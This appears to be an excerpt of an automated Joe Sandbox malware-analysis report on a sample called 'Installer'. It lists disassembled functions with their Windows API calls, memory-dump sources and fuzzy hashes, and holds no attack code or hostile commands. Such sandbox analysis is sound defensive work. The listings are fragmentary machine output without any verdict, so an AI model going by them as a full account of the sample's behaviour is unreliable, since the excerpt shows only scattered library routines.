                                                                                                                                                                                                                                                    • Instruction ID: 714046e21d3f791b2a8ecf2e4e79acd564be4cdc8ae08713116a45c3b71b350f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbbf5e5e24b7df3dfc4b62375458640a1b1458c293bee2e5665f6c7e2c3fbb31
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42F0AFB1A00A059FDB13AF70C81AE6E7B74EF04752F104459F80AAB2B2CF746985CB90
                                                                                                                                                                                                                                                    Function 00342270 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00342288
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0034229C
                                                                                                                                                                                                                                                      • Part of subcall function 00341FB0: CreateFileA.KERNELBASE ref: 00342036
                                                                                                                                                                                                                                                      • Part of subcall function 00341FB0: GetFileSize.KERNEL32(00000000,00000000), ref: 00342046
                                                                                                                                                                                                                                                      • Part of subcall function 00341FB0: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0034206B
                                                                                                                                                                                                                                                      • Part of subcall function 00341FB0: CloseHandle.KERNELBASE(00000000), ref: 0034207A
                                                                                                                                                                                                                                                      • Part of subcall function 00341FB0: _strlen.LIBCMT ref: 003420CD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$HandleModule$CloseCreateNameReadSize_strlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3505371420-0
                                                                                                                                                                                                                                                    • Opcode ID: 3db52c151ce2c4d9e4f6ff0359d78a9d8f0ec057e0c8bd2166b50d1240c8b59b
                                                                                                                                                                                                                                                    • Instruction ID: 7207069ac0c89cede0d778a13643a9ce71beeb6cd5a960c037efb21be78bf7fc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3db52c151ce2c4d9e4f6ff0359d78a9d8f0ec057e0c8bd2166b50d1240c8b59b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5F0E5B19012102BD1337724BC0BFAB7BBCDF85710F000514F58D5E182EA7421858AD3
                                                                                                                                                                                                                                                    Function 0035BED7 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,003602B4,?,00000000,?,?,0035FF54,?,00000007,?,?,0036089A,?,?), ref: 0035BEED
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,003602B4,?,00000000,?,?,0035FF54,?,00000007,?,?,0036089A,?,?), ref: 0035BEF8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                                    • Opcode ID: 2c167b4b0039bd756b281d825a45d5120e7a9c05044718806fc73d46f5afa8f2
                                                                                                                                                                                                                                                    • Instruction ID: bfe3b6b7836ed94dedc62495c109952a8701225529e2190ca0509d46ed6dff66
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c167b4b0039bd756b281d825a45d5120e7a9c05044718806fc73d46f5afa8f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3E08C32204A18ABCB232FA5FC09F997B6CEB00392F114021FA0C9A170CB308984CB94
                                                                                                                                                                                                                                                    Function 0034DEF0 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 195468f8685eb514b79ab8d78a92d9b1e4f1fcbc5879ca3cb491894e14d77642
                                                                                                                                                                                                                                                    • Instruction ID: fac68d4961254ff9098b8b8d4170e0bc1ec2d1a80ce369fc05c5256d50bbf608
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 195468f8685eb514b79ab8d78a92d9b1e4f1fcbc5879ca3cb491894e14d77642
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8341B031A0011AAFCB26DF69D8909EDB7F9FF18310F54406AE446EBA40EB31F945DB90
                                                                                                                                                                                                                                                    Function 0034CB40 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2a8dbf606c9d1d54a760a21b710172b977622ccf535d4300ba4120210ac379f2
                                                                                                                                                                                                                                                    • Instruction ID: 71bd84ac52775869fa49e3146d0c51a3d7532c518e7b92ec830cab13460f11df
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a8dbf606c9d1d54a760a21b710172b977622ccf535d4300ba4120210ac379f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F31B47291110AAFCB52CE68D8809EDB7F8FF09320B14122AE515EB690D731FD45CB90
                                                                                                                                                                                                                                                    Function 0034B060 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0034AFC4: GetModuleHandleExW.KERNEL32(00000002,00000000,00348A2A,?,?,0034AF87,00348A2A,?,0034AF58,00348A2A,?,?,?), ref: 0034AFD0
                                                                                                                                                                                                                                                    • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,C82EE5EC,?,?,?,Function_0002BE94,000000FF), ref: 0034B0C7
                                                                                                                                                                                                                                                      • Part of subcall function 0034AEFA: std::_Throw_Cpp_error.LIBCPMT ref: 0034AF1B
                                                                                                                                                                                                                                                      • Part of subcall function 0034EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00348E4A,0034A2F0), ref: 0034EFE7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3627539351-0
                                                                                                                                                                                                                                                    • Opcode ID: 1456c70a568e9f8337984f12e3e139ec58740894356678fd8916508bc0c8d36b
                                                                                                                                                                                                                                                    • Instruction ID: e1b4c33e30b72034941c009e9eb9dbd5da14c26019fbcbd2e4c84ab636f45d8f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1456c70a568e9f8337984f12e3e139ec58740894356678fd8916508bc0c8d36b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14110432640A40ABCB3B6B659C12A2EB7E9FB41B20F01441EF4199F6D0CF39FC40DA41
                                                                                                                                                                                                                                                    Function 0035CFD6 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3ce16859dcbe7434fb9f3c21d48ab2e12de958904260ec530025b56edc0f7b54
                                                                                                                                                                                                                                                    • Instruction ID: f4c7395b41f5ffc65fc0cd9923e20220e12369910b760d92f5acb18404426d26
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ce16859dcbe7434fb9f3c21d48ab2e12de958904260ec530025b56edc0f7b54
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6701F5332102155FDB379E68EC41E2673BEBBC0761F264024FE089B5E4DB31D846A750
                                                                                                                                                                                                                                                    Function 0034CB32 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3988221542-0
                                                                                                                                                                                                                                                    • Opcode ID: c2fa7ffa83f0417901b80842ac7290403ef21fea0bd79a819b82f64a35e5e234
                                                                                                                                                                                                                                                    • Instruction ID: 2f59e8d4f91e1b80611095bb0732a14e555da04d336125908ec2e46dc3743e81
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2fa7ffa83f0417901b80842ac7290403ef21fea0bd79a819b82f64a35e5e234
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B501947622A2824ECB878B78F8B52A8BB90FF91334B20A16FD0118C4D1CB127811C300
                                                                                                                                                                                                                                                    Function 00347770 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::_Release_chore.LIBCPMT ref: 003477C6
                                                                                                                                                                                                                                                      • Part of subcall function 0034AF64: CloseThreadpoolWork.KERNEL32(?,00000000,?,003478DA,00000000), ref: 0034AF72
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseConcurrency::details::_Release_choreThreadpoolWork
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 312417170-0
                                                                                                                                                                                                                                                    • Opcode ID: c1d4b784f005c49fed4733d535ecbe35587a822deb5f5a4c5723f6024c70fa46
                                                                                                                                                                                                                                                    • Instruction ID: b1095484f51d19f592d224f6a2e42800b904b4a5087f4a05280d52c26feab014
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1d4b784f005c49fed4733d535ecbe35587a822deb5f5a4c5723f6024c70fa46
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37014BB1C406599BDB01EF94DC4679EFBB4FB44720F004239E8196B351E379AA85CBD2
                                                                                                                                                                                                                                                    Function 0035BF11 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,0035DF35,?,?,0035DF35,00000220,?,00000000,?), ref: 0035BF43
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: dbb9865109fe913667b317b7f36e26ae0167a2e4377642bc5bca624132f00949
                                                                                                                                                                                                                                                    • Instruction ID: ecc0edb5debecdb25a097323aa2331699609388d9a2e054644dd3b1424e51608
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbb9865109fe913667b317b7f36e26ae0167a2e4377642bc5bca624132f00949
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08E06D31219A2166DB332A66AC01F5ABA5C9F41BA3F160161EC5D9A1B0DB20EC48D9B1
                                                                                                                                                                                                                                                    Function 003498F0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0034990F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 118556049-0
                                                                                                                                                                                                                                                    • Opcode ID: 1b9d5162fc47b30889bd4cfe6d5094b808955b65bcac724bd68f84af60835245
                                                                                                                                                                                                                                                    • Instruction ID: 4f97b0e5e650c2775d85e0e395c26b5769275bd6b65d0c80d20e947745f5a62c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b9d5162fc47b30889bd4cfe6d5094b808955b65bcac724bd68f84af60835245
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6D0A7397014244F87267F29A81892EF3A5FFC9720357449AE944DB346CB24EC4287C0

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00361287 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
                                                                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0036138F
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 003613CD
                                                                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 003613E0
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00361428
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00361443
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                    • String ID: ,K7
                                                                                                                                                                                                                                                    • API String ID: 415426439-1697011031
                                                                                                                                                                                                                                                    • Opcode ID: 23504dfc4e933c69730e0f5e92233b4a1b2a0716b6130f3ba639b71e2626cbc7
                                                                                                                                                                                                                                                    • Instruction ID: c32a4522b7336582df8ba3b5243482cd12176ad5297fe9fc78d10fb8d6e83ebd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23504dfc4e933c69730e0f5e92233b4a1b2a0716b6130f3ba639b71e2626cbc7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44517072A10605AFDB23DFA5CC45EBE77B8EF05700F198469F905EB194EB709A44CB60
                                                                                                                                                                                                                                                    Function 00367792 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
